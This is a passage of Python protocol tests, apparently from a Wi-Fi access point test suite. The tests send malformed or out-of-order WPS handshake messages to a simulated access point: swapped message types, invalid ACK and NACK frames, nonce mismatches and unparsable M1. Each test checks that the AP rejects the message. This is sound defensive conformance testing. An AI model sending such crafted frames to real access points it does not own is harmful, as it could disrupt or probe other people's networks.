    uuid_e = 16*b'\x11'
    e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
with alloc_fail(hapd, 1, "wpabuf_alloc_copy;wps_process_pubkey"):
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
wps_wait_eap_failure(hapd, dev[0])
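# wps_wait_eap_failure() verifies that the AP reports EAP-Failure and that
# the station disconnects.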
def wps_wait_eap_failure(hapd, dev):
ev = hapd.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("EAP-Failure not reported")
dev.wait_disconnected()
@remote_compatible
def test_wps_ext_m3_m1(dev, apdev):
"""WPS proto: M3 replaced with M1"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(M1) to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M1)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m5_m3(dev, apdev):
"""WPS proto: M5 replaced with M3"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5(M3) to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m3_m2(dev, apdev):
"""WPS proto: M3 replaced with M2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(M2) to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M2)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m3_m5(dev, apdev):
"""WPS proto: M3 replaced with M5"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(M5) to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m3_m7(dev, apdev):
"""WPS proto: M3 replaced with M7"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(M7) to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m3_done(dev, apdev):
"""WPS proto: M3 replaced with WSC_Done"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(WSC_Done) to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_WSC_DONE)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, addr, m3)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_invalid(dev, apdev):
"""WPS proto: M2 followed by invalid NACK"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
attrs = b'\x10\x00\x00'
nack = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_NACK)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_no_msg_type(dev, apdev):
"""WPS proto: M2 followed by NACK without Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
msg_type=None, eap_code=2)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_invalid_msg_type(dev, apdev):
"""WPS proto: M2 followed by NACK with invalid Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
msg_type=WPS_WSC_ACK, eap_code=2)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_e_nonce_mismatch(dev, apdev):
    """WPS proto: M2 followed by NACK with E-Nonce mismatch"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], 16*b'\x00', r_nonce,
eap_code=2)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_no_config_error(dev, apdev):
"""WPS proto: M2 followed by NACK without Config Error"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
config_error=None, eap_code=2)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack_invalid(dev, apdev):
"""WPS proto: M2 followed by invalid ACK"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
attrs = b'\x10\x00\x00'
ack = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_ACK)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack(dev, apdev):
"""WPS proto: M2 followed by ACK"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], e_nonce, r_nonce, eap_code=2)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack_no_msg_type(dev, apdev):
"""WPS proto: M2 followed by ACK missing Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], e_nonce, r_nonce,
msg_type=None, eap_code=2)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack_invalid_msg_type(dev, apdev):
"""WPS proto: M2 followed by ACK with invalid Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], e_nonce, r_nonce,
msg_type=WPS_WSC_NACK, eap_code=2)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack_e_nonce_mismatch(dev, apdev):
    """WPS proto: M2 followed by ACK with E-Nonce mismatch"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], 16*b'\x00', r_nonce,
eap_code=2)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m1_invalid(dev, apdev):
"""WPS proto: M1 failing parsing"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
logger.debug("Send M1 to AP")
attrs = b'\x10\x00\x00'
m1 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m1)
wps_wait_eap_failure(hapd, dev[0])
def test_wps_ext_m1_missing_msg_type(dev, apdev):
"""WPS proto: M1 missing Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
logger.debug("Send M1 to AP")
attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
m1 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m1)
wps_wait_ap_nack(hapd, dev[0], 16*b'\x00', 16*b'\x00')
def wps_ext_wsc_done(dev, apdev):
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
